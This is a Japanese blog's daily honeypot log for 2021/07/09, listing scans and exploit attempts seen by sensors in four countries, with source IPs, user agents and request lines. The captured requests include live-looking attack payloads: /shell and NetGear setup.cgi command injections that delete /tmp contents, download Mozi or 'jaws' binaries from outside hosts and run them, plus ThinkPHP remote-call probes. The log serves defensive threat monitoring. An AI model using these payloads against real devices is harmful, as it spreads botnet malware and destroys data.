コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/07/09 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/07/09分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
gbrmssによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

UserAgentがHello, Worldであるアクセス
を確認しました。

Location:UK

Spring Bootの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  209.141.41.11/jaws;
sh /tmp/jaws
Location:SG

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:60 (前日比:+18)
US:総アクセス数:70 (前日比:-59)
UK:総アクセス数:55 (前日比:+8)
SG:総アクセス数:55 (前日比:-1)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 2.57.122.53 Romania
1 13.89.52.110 United States
1 20.38.0.224 United States
1 20.58.173.63 United States
22 45.146.164.110 Russia
1 52.68.175.148 United States
1 54.189.138.76 United States
1 61.219.11.151 Taiwan
2 77.247.108.77 Belize
1 109.104.151.10 Albania
1 111.92.72.249 India
1 115.54.239.164 China
1 116.68.111.208 India
3 135.125.244.48 France
1 142.93.146.198 United States
1 144.76.31.100 Germany
1 154.160.14.67 Ghana
1 167.71.57.16 United States
1 185.153.196.198 Russia
1 192.241.202.30 United States
1 192.241.209.237 United States
1 192.241.221.149 United States
4 194.195.240.247 United States
1 196.70.69.19 Morocco
3 209.141.41.98 United States
2 209.141.47.35 United States
1 212.92.101.90 Russia
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
8 -
1 Hello, World
1 Hello, world
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
1 Mozilla/5.0
1 Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1
10 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1
3 Mozilla/5.0 zgrab/0.x
2 gbrmss/7.29.0
1 python-requests/2.24.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
1 \x16\x03\x01\x01\xfa\x01
2 \x17\x03\x01\x01\x04e
1 \xbf\xbf\xaf\xaf~
13 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /admin/config.php HTTP/1.0
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sip16b97a7c626cce4e09665ec04cd03ffe/e4e2e9eea1acefa1b4b8e0e5b0e3b3e7e2b6b5 HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.53 Romania
1 5.8.10.202 Russia
1 20.38.0.224 United States
1 34.215.35.54 United States
1 42.194.183.200 China
22 45.146.164.110 Russia
1 61.219.11.151 Taiwan
6 68.183.122.105 United States
2 77.247.108.77 Belize
1 78.128.112.18 Bulgaria
1 103.145.13.120 India
1 104.224.29.59 United States
1 109.103.234.164 Romania
1 139.162.145.250 Netherlands
2 147.182.188.88 United States
4 161.35.100.36 United States
1 162.62.123.46 Singapore
3 163.172.159.134 United Kingdom
1 165.22.250.112 United States
4 172.105.18.198 United States
1 183.136.225.14 China
1 192.241.211.157 United States
1 192.241.212.223 United States
1 202.164.138.52 India
1 202.164.138.117 India
2 209.141.41.98 United States
3 209.141.47.35 United States
3 212.47.244.68 France
1 212.92.101.90 Russia

UserAgent一覧

件数 UserAgent
17 -
1 Go-http-client/1.1
1 Hello, World
2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4; rv:51.0.1) Gecko/20100101 Firefox/51.0.1
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
2 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1
2 Mozilla/5.0 zgrab/0.x
2 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 \x16\x03\x01\x01\xfb\x01
4 \x17\x03\x01\x01\x04e
2 \xbf\xbf\xaf\xaf~
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
2 GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
2 GET /admin/config.php HTTP/1.0
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /c/version.js HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /server-status HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//futility[.]best/125020a84b660b6718f6875ed8ecb91ec0bdb95931527c122c17189e8fd24efa2e76b36c5717a7438fe68f15c71b06444d17b3af83f755bf378234a241700f18bc8506251c697c8d05bcf619c64b89ab49fe6a7e0de313443ebd8e9ebbbbbc5f HTTP/1.1
1 POST http[:]//rosamoss[.]fun/d7f890c4f72a3d49b69870b2dc2850c698e7b841eb2dd7cd21e4de551a29f4c41c6ab28c79e34b65d04c708546a85e7406b29be160cb7c0c343843a34f107fed41395ed16ab0c1b7d4ae362be4d13b181de0a92ad3f49e6f38b8caf283fb4460 HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 42.194.183.200 China
22 45.146.164.110 Russia
6 64.227.74.165 United States
2 77.247.108.77 Belize
4 80.82.77.139 United Kingdom
1 109.104.151.10 Albania
1 118.71.122.213 Vietnam
1 139.162.145.250 Netherlands
1 142.93.146.198 United States
3 152.136.253.158 China
1 162.62.123.46 Singapore
1 173.245.202.201 United States
1 192.241.205.33 United States
1 192.241.210.167 United States
1 192.241.211.125 United States
1 192.241.219.7 United States
1 209.141.41.98 United States
1 209.141.47.35 United States
1 209.141.56.79 United States
1 212.92.101.90 Russia
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
10 -
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
3 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1 Mozilla/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
4 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8
2 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01
1 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /admin/config.php HTTP/1.0
1 GET /bag2 HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;sh+/tmp/jaws
1 GET /sip6b1361f5dced070ce66e541bafb21edb/e4e2e9eea1acefa1b4b8e0e5b0e3b3e7e2b6b5 HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
3 HEAD / HTTP/1.0
1 OPTIONS / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.53 Romania
1 5.39.96.148 France
1 20.94.232.23 United States
1 20.102.80.140 United States
22 45.146.164.110 Russia
3 51.158.78.179 France
1 54.189.138.76 United States
2 77.247.108.77 Belize
1 78.128.112.18 Bulgaria
1 79.124.62.254 Bulgaria
1 109.104.151.10 Albania
1 120.85.116.175 China
1 139.162.145.250 Netherlands
1 147.135.115.235 United States
3 163.172.159.134 United Kingdom
1 192.241.207.130 United States
1 192.241.210.30 United States
1 192.241.222.178 United States
1 192.241.223.163 United States
1 202.164.138.42 India
2 209.141.41.98 United States
2 209.141.47.35 United States
1 212.92.101.90 Russia
2 212.192.241.102 Czechia
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
8 -
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:53.0.3) Gecko/20100101 Firefox/53.0.3
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1
4 Mozilla/5.0 zgrab/0.x
2 gbrmss/7.29.0
1 python-requests/2.9.1

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /admin/config.php HTTP/1.0
1 GET /bag2 HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//202[.]164[.]138[.]42:58076/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//kaymcclurg[.]best/401e089e2d1885e208243cd874d69677ce105953cb2605a1212e2e9304c273cdaebddd41d4a03eebc54da5b3957af9664d2b032fa7866aab4f7a3828097f066735c3993a83a671a843b728f91aff77be99e25827170d7f774e1ba28a59129ec5 HTTP/1.1
1 POST http[:]//kurczak[.]waw[.]pl/1bf559bf6e3347d052964659a664e082ba9f437675814ce1e66220a0ca63eb6523f7f7f03d21eadfba4aee96ff92aee24eb4d095ea60e6830a0038094197708747b10cdd8ae908bc81a14a200065f7f2f0f12302232cde6aaa4a6638c91706bb HTTP/1.1